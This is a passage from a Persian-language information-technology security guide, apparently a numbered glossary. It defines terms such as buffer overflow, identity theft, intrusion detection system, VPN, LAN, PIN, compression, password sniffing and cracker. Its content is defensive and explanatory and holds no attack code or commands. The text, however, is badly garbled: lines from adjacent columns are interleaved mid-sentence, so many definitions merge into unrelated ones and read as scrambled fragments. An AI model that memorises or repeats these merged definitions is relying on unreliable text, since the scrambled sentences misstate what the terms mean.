ﻳﻚ ﺑﺮﺭﺳﻲ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﺣﺎﻓﻈﺔ ﻛـﺎﻓﻲ ﺍﻧﺠـﺎﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻮﺍﻧﺪﻩ ﺷﻮﻧﺪ ،ﻭ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻴـﺰ ﺩﺍﻧـﺴﺘﻦ ﻛﻠﻴـﺪ
ﺩﺍﺩ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﻭﻗﻮﻉ ﺳﺮﺭﻳﺰﻱ bufferﭘﻴﺸﮕﻴﺮﻱ ﻛﺮﺩ. ﺻﺤﻴﺢ ﺿﺮﻭﺭﻱ ﺍﺳﺖ.
٤٢٢ ٤١٦
ﺳﺮﻗﺖ ﻫﻮﻳﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻧﺘﻬﺎ ﺑﻪ ﺍﻧﺘﻬﺎ
ﺑﺨﺶ ﺷﺸﻢ
ﺯﻣﺎﻧﻲ ﺻﻮﺭﺕ ﻣﻲ ﮔﻴﺮﺩ ﻛﻪ ﺷﺨﺼﻲ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﻓﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﻧﻘﻄﺔ ﺁﻏـﺎﺯﻳﻦ ﭘﻴـﺎﻡ ﺩﺭ ﺷـﺒﻜﻪ ،ﻭ ﺑـﻪ ﺩﻧﺒـﺎﻝ ﺁﻥ
ﺷﻤﺎ ﺟﻤﻊﺁﻭﺭﻱ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧـﺪ ﺑـﺮﺍﻱ ﺍﺷـﺨﺎﺹ ﺣﻘـﻮﻗﻲ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺩﺭ ﻣﻘﺼﺪ.
417 Decrypt
418 Cryptography 412 Network-Level Firewall
419 Security Procedures 413 Password Cracker
420 Incident Response Procedures 414 Password
421 Buffer Overflow 415 Encryption
422 Identity Theft 416 End-to-End Encryption
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٦٠
٤٢٨
ﺳﻴﺴﺘﻢ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ )(GPS ﻫﻤﭽﻮﻥ ﺑﺎﻧﻜﻬﺎ ،ﻓﺮﻭﺷﮕﺎﻫﻬﺎ ﻳﺎ ﺩﻭﻟﺖ ،ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺷﻤﺎ ﺟـﺎ
ﻋﻤﺪﺗﹰﺎ ﺑﺮﺍﻱ ﻧﺎﻭﺑﺮﻱ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ .ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﻣـﺎﻫﻮﺍﺭﻩﺍﻱ، ﺑﺰﻧﺪ.
ﻣﺤﻞ ﺩﻗﻴﻖ ﻣﺸﺘﺮﻛﺎﻥ ﺭﻭﻱ ﻛﺮﺓ ﺯﻣﻴﻦ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ.
٤٢٣
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
٤٢٩
ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ )(IDS ﺑﺼﻮﺭﺕ ﻋﺎﻡ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻛﻨﺘﺮﻟﮕﺮ ﺷﺒﻜﺔ ﻣﺤﻠـﻲ ،ﻛـﻪ
ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﻪ ﻳﺎﻓﺘﻦ ﺭﺧﻨﻪﻫﺎ ﻳﺎ ﺗﻼﺷـﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﺧﻨـﻪ ﺩﺳﺘﺮﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻪ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ،ﭼﺎﭘﮕﺮﻫـﺎ ﻭ ﺳـﺎﻳﺮ
ﺻــﻮﺭﺕ ﻣــﻲﮔﻴــﺮﺩ ﺍﺧﺘــﺼﺎﺹ ﺩﺍﺩﻩ ﺷــﺪﻩ ،ﻭ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺩﺍﺭﺩ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ﻛﻪ ﺭﻭﻱ ﺛﺒﺘﻬﺎ ﻳﺎ ﺳﺎﻳﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪ
٤٢٤
ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻋﻤﻞ ﻣﻲﻧﻤﺎﻳﺪ. ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ
ﺑﺼﻮﺭﺕ ﻋﺎﻡ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻳـﻚ
٤٣٠
ﺳﻴﺎﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﺭ ﺧﺼﻮﺹ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺳـﺮﻭﻳﺲ ﺩﺭﺧﻮﺍﺳـﺖ
ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻌﻘـﻮﻝ ﺍﺯ ﻣﻨـﺎﺑﻊ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﺎﺳﺦ ﻣﻘﺘﻀﻲ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﺩﻫﺪ.
ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺣﺎﻛﻢ ﺍﺳﺖ.
٤٢٥
ﺳﻠﺴﻠﺔ ﻣﻤﻴﺰﻱ
٤٣١
ﺷﺒﻜﺔ ﺧﺎﺭﺟﻲ ﻣﺠﻤﻮﻋﻪﺍﻱ ﻣﺴﺘﻨﺪ ﺍﺯ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﺭﺍﻫﺒﺮ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨـﺪ
ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺗﻮﺳﻌﺔ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺍﺯ ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﺩﻭﺭ ﻳـﺎ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﮔﺬﺷﺘﺔ ﺳﻴﺴﺘﻢ ﺭﺍ )ﺭﻭﻱ ﻛﺎﻏﺬ ﻳﺎ ﺭﻭﻱ ﺩﻳﺴﻚ(
ﺍﻳﻨﺘﺮﻧﺘــﻲ ﺑﮕﻮﻧــﻪﺍﻱ ﻛــﻪ ﺷــﺮﻛﺎﻱ ﺧــﺎﺭﺝ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﻣﺜــﻞ ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨــﺪ .ﺩﺭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍﻳﺎﻧــﻪ ،ﺯﻣــﺎﻥ ﻭﺭﻭﺩ
ﻋﺮﺿﻪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻣﻌﻤﻮﻝ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴـﺮﺩ .ﭼﻨـﻴﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﻣﺪﺕﺯﻣﺎﻧﻲ ﻛﻪ ﻣﺸﻐﻮﻝ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ
ﺭﻭﺍﺑﻄﻲ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﺼﺪﻳﻖﺷﺪﺓ ﺑﺨـﺸﻬﺎﻱ ﻣﺠـﺎﺯ ﻫﺴﺘﻨﺪ ،ﻛﺎﺭﻱ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﻭ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺗﺨﻠﻒ ﺗﻌﻤﺪﻱ ﺍﺯ
ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﺮﻳﻢ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﻳﺎ ﻧﻪ ،ﺑﺘﺮﺗﻴﺐ ﺯﻣـﺎﻥ ﻭﻗـﻮﻉ ﺑـﻪ
ﺧﺼﻮﺻﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﮔﺮﺩﻧﺪ. ﺛﺒﺖ ﻣﻲﺭﺳﻨﺪ.
٤٣٢ ٤٢٦
ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )(VPN ﺳﻴﺴﺘﻢ ﺟﻬﺎﻧﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳﻴﺎﺭ )(GSM
ﻳﻚ ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴـﺎﻥ ﺩﻭ ﻣﺎﺷـﻴﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺎﺯ ﻭ ﻏﻴﺮ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﺳـﺖ ﻛـﻪ ﭘﻴﻮﺳـﺘﻪ ﺩﺭﺣـﺎﻝ
ﺗﺮﺍﻓﻴﻜﻲ ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ .ﻓﻨﺎﻭﺭﻱ ﺗﻜﺎﻣﻞ ﺍﺳﺖ .ﮔﺮﺩﺵ ﻣﺎﻫﻮﺍﺭﺓ GSMﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳـﻦ
VPNﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺳﺮﻭﻳﺲ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺩﺭ ﭘﻮﺷﺶ ﺯﻣﻴﻨﻲ ﻣﻤﻜﻦ ﻧﻴﺴﺖ
ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺑﻄﻮﺭ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ، ﺭﺍ ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺍﺳﺖ.
ﺩﻓﺎﺗﺮ ﺷﻌﺐ ،ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺮﺳﺎﻧﺪ.
٤٢٧
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ )(OS
٤٣٣
ﺷﺒﻜﺔ ﻣﺤﻠﻲ )(LAN ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺟـﺎﻧﺒﻲ ﺁﻧـﺮﺍ
ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪﻫـﻢ ﻣﺘـﺼﻞ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺟـﺎﻧﺒﻲ. ﻛﻨﺘﺮﻝ ﻣﻲ ﻛﻨﺪ .ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ﺟﺪﻳﺪﺗﺮ ﻣﺜﻞ ،Linux ،Unix
ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﻳﻜـﺪﻳﮕﺮ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﻭ Windows XPﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﭘﺎﻳﻪﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ
ﻼ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭼﺎﭘﮕﺮﻫـﺎﻱﺟﺎﻧﺒﻲ ﺭﺍ ﺑﻪﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ -ﻣﺜ ﹰ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ.
ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺼﻮﺭﺕ ﺍﺷﺘﺮﺍﻛﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
٤٤٠
ﺿﻤﻴﻤﻪ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ )(WLAN
ﺿﻤﻴﻤﻪ ﺗﻜﻨﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻣﺘـﻮﻥ ﻭ ﺗـﺼﺎﻭﻳﺮ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻳـﺎ ﺳـﺎﻳﺮ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳـﺎﻝ ﺷـﻮﻧﺪ .ﻫـﺮ ﻓﺎﻳـﻞ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﻴﺎﺭ ﺑﻪ ﺷﺒﻜﻪﻫﺎ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ.
ﻏﻴﺮﻧﻮﺷﺘﺎﺭﻱ )ﺑﺮﻧﺎﻣﻪ ،ﻳﺎ ﺗﺼﻮﻳﺮ ﻳﺎ ﻓـﻴﻠﻢ ﻭﻳـﺪﺋﻮﻳﻲ( ﺗﺒـﺪﻳﻞ ﺑـﻪ ﻳـﻚ
٤٣٤
ﺷﻜﻞ ﻗﺎﺑﻞ ﭼـﺎﭖ ﻣـﻲﺷـﻮﺩ ﻛﺪﮔـﺬﺍﺭﻱ ﻭ ﺩﺭ ﻣـﺘﻦ ﭘﻴـﺎﻡ ﻗـﺮﺍﺭ ﺷﻤﺎﺭﺓ ﻫﻮﻳﺖ ﺷﺨﺼﻲ )(PIN
ﻣﻲﮔﻴﺮﺩ .ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﺻﻔﺮﻫﺎ ﻭ ﻳﻚ ﺭﺷﺘﻪ ﺍﺯ ﺍﻋﺪﺍﺩ ﻳﺎ ﺣﺮﻭﻑ ﻛﻪ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻳـﻚ
ﻳﻚﻫﺎ ﺍﺳﺖ .ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺣﺎﻟﺖ ،ﻛﺪﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺻﻔﺮ ﻭ ﻳﻚﻫﺎ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺳﺮﻭﻳﺲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺷﻤﺎﺭﺓ ﻫﻮﻳﺖ
ﺭﺍ ﺑﻪ ﺣﺮﻭﻑ ﻣﺘﻦﺳﺎﺩﻩ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﺪ. ﺷﺨﺼﻲ ﻣﺸﺎﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺖ ﺍﻣﺎ ﻋﻤﻮﻣﹰﺎ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻣﻌـﺎﻣﻼﺕ
ﻣﺎﻟﻲ )ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ( ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ
ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻳﻚ ﻣﻜﺎﻥ ﻣﻲﺑﺎﺷﺪ.
ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻳﺎ ﺍﻧﺘﻘﺎﻝ ﺣﺠﻢ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺘﻮﻥ ،ﺗـﺼﺎﻭﻳﺮ ،ﻭ
٤٣٥
ﺑﺮﻧﺎﻣــﻪﻫــﺎ .ﺣﺘــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺗﻤــﺎﻡ ﺳــﻮﺍﺑﻖ ﺑﺎﻳﮕــﺎﻧﻲ ﻧﻴــﺰ ﺷﻨﺎﺳﺎﻳﻲ
ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ؛ ﻭ ﺩﺭ ﺣﻘﻴﻘﺖ ﺩﺭ ﺗﻬﻴﻪ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ، ﺷﻨﺎﺧﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻳﻜﺘﺎ.
ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻳـﻚ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺍﺳـﺖ .ﺍﺯ ﺑﺎﻳﮕـﺎﻧﻲﻫـﺎﻱ ﻓـﺸﺮﺩﻩ ٤٣٦
ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ " "zipﻭ " "tarﺍﺷﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺗﻮﺳﻂ ﺁﻥ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛـﺎﺭﺑﺮ ﻣﻌﺘﺒـﺮ
ﺣﺠﻢ ﺯﻳﺎﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺘﻔﺮﻗـﻪ ﺭﺍ ﺩﺭ ﻳـﻚ ﻗﺎﻟـﺐ ﭼﮕـﺎﻝ ﻭ
ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﺪ .ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﺑـﺎ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻓﺸﺮﺩﻩ ﻧﮕﻬﺪﺍﺭﻧﺪ .ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ﺑﺎﻳﺪ ﺍﺯ ﻗﺎﻟـﺐ ﻓـﺸﺮﺩﻩ
-ﻛﻪ ﻃﻲ ﺁﻥ ﻣﺸﺨﺺ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳـﺖ ﻛـﻪ
ﺧﺎﺭﺝ ﺷﻮﻧﺪ .ﭼﻨﺪ ﻓﺮﻭﺷﻨﺪﻩ ﻭ ﺗﻌﺪﺍﺩﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍﻳﮕـﺎﻥ ﺑـﺮﺍﻱ
ﺧﻮﺩﺵ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻭ ﺣﻖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﺩ -
ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ.
ﻧﻴﺴﺖ.
٤٤١
ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ٤٣٧
ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ
ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺘﻮﺍﻧﺪ ﻭﻇﻴﻔﺔ ﺧﻮﺩ ﺭﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺩﺭ
ﻳﻚ ﺭﺷﺘﻪ ﺣﺮﻭﻑ ﻳﻜﺘﺎ ﻛﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺷﻨﺎﺳﺎﻧﺪ.
ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﺧﺎﺹ ﻭ ﺗﺤﺖ ﺷﺮﺍﻳﻂ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﺭﺳﺎﻧﺪ. ٤٣٨
ﺷﻨﻮﺩ ﺭﻣﺰ ﻋﺒﻮﺭ
٤٤٢ ﻻ ﺭﻭﻱ ﻳﻚ ﺷـﺒﻜﺔ ﻣﺤﻠـﻲ ،ﺑـﺮﺍﻱ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﺨﻔﻴﺎﻧﻪ ،ﻣﻌﻤﻮ ﹰ
ﻣﻘﻴﺎﺱﭘﺬﻳﺮﻱ
ﻓﻬﻤﻴﺪﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ.
ﻗﺎﺑﻠﻴﺖ ﮔﺴﺘﺮﺵ ﻳﻚ ﺭﺍﻩﺣﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛﻤﺘـﺮﻳﻦ
ﺗﺄﺛﻴﺮ ﺑﺮ ﻛﺎﺭﺁﻳﻲ ،ﺑﺘﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﮔـﺮﻭﻩ ﺑﺰﺭﮔﺘـﺮﻱ ﺍﺯ ﻛـﺎﺑﺮﺍﻥ ٤٣٩
ﻃﺮﺡ ﺍﻗﺘﻀﺎﻳﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ. ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﻨﺎﺑﻊ ﻣﻬـﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ
٤٤٣ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﻧﺎﮔﻮﺍﺭ )ﻣﺜﻞ ﺯﻟﺰﻟﻪ ﻳﺎ ﺳﻴﻞ( ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻥ
ﻗﻔﻞﺷﻜﻦ
ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ .ﺍﻳﻦ ﻃﺮﺡ ﺷﺎﻣﻞ ﻋﻤﻠﻴـﺎﺕ ﻭﺍﻛـﻨﺶ
ﻛﺴﻲ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﺑﺪﻭﻥ ﻛﺴﺐ ﻣﺠﻮﺯ ،ﺍﻣﻨﻴﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍ
ﺍﺿﻄﺮﺍﺭﻱ ،ﻋﻤﻠﻴﺎﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻭ ﻋﻤﻠﻴـﺎﺕ ﺗـﺮﻣﻴ ﹺﻢ ﭘـﺲ ﺍﺯ
ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ ﻭ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ) .ﺗﻌﺮﻳـﻒ Hackerﺭﺍ
ﺑﺨﺶ ﺷﺸﻢ
ﺣﺎﺩﺛﻪ ﻣﻲﺷﻮﺩ.
ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ(.
٤٥٠ ٤٤٤
ﻛﻠﻴﺪ ﻛﺎﺭﺑﺮ
ﺩﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﺳﻠﺴﻪﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﺍﺳﺖ ﻛﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺒﺪﻳﻞ ﻳﻚ ﻫﺮ ﺷﺨﺼﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﺎ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺗﻌﺎﻣـﻞ
ﻓﺎﻳﻞ ﺑﻪ ﻭ ﻳﺎ ﺍﺯ ﻗﺎﻟﺐ ﺭﻣﺰﻱ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ .ﺷـﻤﺎ ﺑـﻪ ﺩﻭ ﺷـﻜﻞ ﺑﺎﺷﺪ.
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻠﻴﺪ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ :ﺑﻪ ﺷﻜﻞ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ ﻭ ﺍﻋﺪﺍﺩ )ﺍﺭﻗﺎﻡ
٤٤٥
ﺩﺭ ﻣﺒﻨﺎﻱ ،(۱۶ﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﻓﺸﺮﺩﻩ .ﺩﺭ ﺑﺎﺯﺍﺭ ﺍﻣﻨﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ
